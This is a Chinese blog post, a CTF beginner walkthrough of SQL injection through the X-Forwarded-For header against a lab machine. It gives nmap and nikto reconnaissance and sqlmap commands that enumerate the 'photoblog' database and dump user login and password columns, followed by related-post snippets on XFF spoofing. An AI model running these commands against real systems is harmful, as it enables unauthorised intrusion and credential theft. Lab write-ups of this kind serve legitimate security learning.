6-3CTF夺旗入门教程--SQL注入-X-Forwarded-For报文头

最新推荐文章于 2023-05-21 17:36:41 发布
最新推荐文章于 2023-05-21 17:36:41 发布
阅读量246 收藏 1
点赞数
分类专栏: CTF学习 文章标签: 安全 数据库 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46622606/article/details/105420480
版权
1.信息探测
#扫描主机服务信息以及服务版本
nmap -sV 192.168.2.118
#快速扫描主机全部信息
nmap -T4 -A -v 192.168.2.118
#探测敏感信息
nikto -host http://192.168.2.118
2.漏洞扫描

#因为之前AVWS13没有装成功,所以没有运行截图
AVWS

3.漏洞利用
#查看数据库信息
sqlmap -u http://192.168.2.118 --headers="X-Forwarded-For:*" --dbs --batch
#查看数据库中的表信息
sqlmap -u http://192.168.2.118 --headers="X-Forwarded-For:*" -D "photoblog" --tables --batch
#查看表中的字段信息
sqlmap -u http://192.168.2.118 --headers="X-Forwarded-For:*" -D "photoblog" -T "users" --columns --batch
#查看字段值
sqlmap -u http://192.168.2.118 --headers="X-Forwarded-For:*" -D "photoblog" -T "users" -C "login,password" --dump --batch
The Riddler.
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF练习:SQL注入之X-Forwarded-For报
qq_43233085的博客
11-28 985
CTF练习:SQL注入之get参数注入环境准备信息收集漏洞挖掘sqlmap注入上传shell脚本(copy)拿到靶机shell(copy) 靶机地址: 链接: https://pan.baidu.com/s/1u-br8L4Lk4X7EGS7kROhMQ 提取码: 2fmj 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172....
小白学习CTF第八天-web安全sql注入(X-Forwarded-For)
bbhh1139的博客
04-20 323
X-Forwarded-For SQL注入介绍 信息探测 这些都是基本操作。 打开敏感的网址: 漏洞扫描 添加完目标之后扫描就可以,但是我没使用这个,主要我没安装这个 使用owasp-zap发现有一个高危的漏洞,可以成为sql注入点 漏洞利用 sqlmap -u "http://192.168.56.107" --headers="X-Forwarded-For:*" --db...
CTF-Sql注入X-Forwarded-For(bind sql injecion)
IT小学子的博客
05-03 226
nmap -sV 192.168.1.103 awvs漏洞扫描器 漏洞利用 利用sqlmap sqlmap -u url --headers="X-Forwarded-For:*" --dbs --batch sqlmap -u http://192.168.1.103 --headers="X-Forwarded-For:*" -D photoblog --tables --batch ...
SQL基础学习笔记【Forward
u010312614的专栏
01-03 446
数据定义 create alter drop table、view、index、procedure、trigger、schema、domain 数据操作 select insert delete update 数据控制 grant deny revoke 事物控制 commit rollback set transaction 注明:以下SQL语句中M,N为表
CTF-SQL注入(X-Forwarded-For)
su__xiaoyan的博客
12-24 576
SQL注入 当Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。 X-Forwarded-For HTTP请求部字段,用来表示 HTTP 请求端真实 IP。 XFF注入/ X-Forwarded-For XFF,是X-Forwarded-for的缩写,XFF注入是SQL注入的一种,该注入原理是通过修改X-Forwarded-for对带入系统的dns进行sql注
CTF-MISC关于各类编码习题(湖工商扛把子)
03-17
在“CTF-MISC关于各类编码习题(湖工商扛把子)”这个主题中,你可以通过实践和解决1-1等文件中的题目,进一步提升自己在编码解码方面的技能。了解和熟练掌握这些编码方式对于CTF比赛中的Misc任务至关重要,能够帮助...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
超微X11SPW-CTF主板用户手册
最新发布
04-01
超微X11SPW-CTF主板用户手册
saigar-ctf:Saigar CTF 平台
05-29
赛加尔CTF世界上第一个众包调查的 CTF 平台介绍Saigar CTF 是一个开源 CTF 平台,用于促进众包调查,可以扩展到数百个具有实时数据的并发用户。 Saigar CTF 平台促成的最大事件有500 多个用户,在6 小时内提交了8,...
pin-in-CTF:使用intel pin来求解一部分CTF challenge
05-09
4. **pin-in-CTF-master文件夹结构**: 该项目的主分支可能包含以下内容: - `src`: 存放Pin工具的源代码和插件代码。 - `docs`: 文档和教程,帮助理解如何使用Pin工具解决CTF挑战。 - `examples`: 示例代码,...
CTFRTSSamples.unitypackage
01-12
CTFRTSSamples.unitypackage CTFRTSSamples.unitypackageCTFRTSSamples.unitypackage
CTF之路:关于X-Forwarded-For注入
zw05011的博客
01-05 3066
题目 输入任意用户名密码登录,显示IP禁止访问。 知识点 伪造XFF绕过服务器IP过滤 IP伪造 TCP/IP层面的IP伪造很难实现,因为更改后很难实现正常的TCP通信,但在HTTP层面的伪造就显得很容易。可以通过伪造XFF进行IP伪造 XFF字段 X-Forwarded-For(XFF)简称XFF,是HTTP 报文部的关键字段之一。代表了HTTP的请求端真实的IP。它被认为是客户端通过HTTP代理或者负载均衡器连接到web服务端获取源ip地址的一个标准(通常一些网站的防注入..
ctf训练 web安全SQL注入(X-Forwarded-For)
qq_43799246的博客
12-02 570
ctf训练 web安全SQL注入(X-Forwarded-For) SQL注入漏洞介绍 SQL注入攻击指用用户构建特殊的输入作为参数传入Web应用程序,通过执行sQ语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中; 实验环境 一台kail攻击机 和 靶机 靶机镜像:https://pan.baidu.com/s/1juB-vkfP9C7RHEM5T4ffAA 提取码:dquy 安
CTF--基于X-Forwarded-For的IP地址伪造
MachineGunJoe666
04-15 1683
X-Forwarded-For以及其作用 一般的客户端(例如:浏览器)在发送HTTP请求时,并不会设置X-Forwarded-For,当请求在到达第一个代理服务器时,代理服务器会在请求字段中加上X-Forwarded-For这个字段,并将其值设置为客户端的IP地址,后面如果还有更多的代理服务器,会依次将Ip地址追加到X-Forwarded-For这个字段中,最终当请求到达了Web应用服务器,应用会通过获取X-Forwarded-For取出最左边的IP地址,即为客户端的真实IP地址。 如果客户端在发起
【网络安全 | CTF】攻防世界 xff_referer 解题详析
等风来
05-21 4919
(简称 XFF)是一个 HTTP 请求部字段,它用于表示 HTTP 请求的客户端 IP 地址,尤其是当请求通过一个中介代理或负载均衡器时。该字段的值通常是一个逗号分隔的 IP 地址列表,其中第一个 IP 地址是最初连接到中介代理或负载均衡器的客户端 IP 地址。因为在这种情况下,服务器只能看到请求的中介代理或负载均衡器的 IP 地址,而无法直接获取客户端的真实 IP 地址。是另一个 HTTP 请求部字段,它包含了当前请求的来源页面 URL 地址,即前一个页面的 URL 地址。
xff(x-forwarded-for)介绍,某些ctf题目中的利用
09-07 7650
IP伪造 TCP/IP层面的IP伪造很难实现,因为更改后很难实现正常的TCP通信,但在HTTP层面的伪造就显得很容易。可以通过伪造XFF进行IP伪造 XFF字段 X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求字段。通俗来说,就是浏览器访问网站的IP。一般格式: X-Forwarded-For: clien...
X-Forwarded-For绕过服务器IP地址过滤
热门推荐
公众号shadow sock7
06-03 1万+
参考: http://www.jianshu.com/p/98c08956183d https://github.com/bl4de/ctf/blob/master/2017/nullcon_HackIM_2017/Web1.md看到一个CTF题中有一个与X-Forwarded-For有关的。 通过在HTTP中设置X-Forwarded-For: 127.0.0.1在正常的TCP 通信中,是
CTF攻防世界web题解题思路XFF-REFERER
m0_63687631的博客
12-25 3070
1.打开网页 2.然抓个包改变下ip 3.用X-Forwarded-For改变ip,如图: 4.因为要重复使用所以要用repeater,然后发送 5. 然后是这样,点击render 6.最后输入referer 7.点render,可得到flag 知识点: 1.ip地址可以用,X-Forwarded-For改 2.referer是就是来源网站。 ...
HTTP注入漏洞测试(X-Forwarded-for)
cc_de_csdn的博客
08-25 794
1.使用BrupSuite捕获flag.php页面的报文并发送到Repeater 2.发现报文中并没有X-Forwarded-for条目,自己添加 3.在X-Forwarded-for条目后面使用mysql注入语句测试注入 1.判断字段:使用order by,测试出有四个字段 2.使用union select 1,2,3,4 查看回显的位置 3.判断表名union select 1,2,3,(se...
CTF-WEB入门指南:技能、资源与漏洞解析
"这篇文档是针对想要入门CTF(Capture The Flag)竞赛,特别是Web安全领域的初学者。文档强调了参与CTF的目的,无论是娱乐还是为未来的职业发展做准备,并提醒学习者要有毅力和牺牲休息时间的决心。内容涵盖了需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值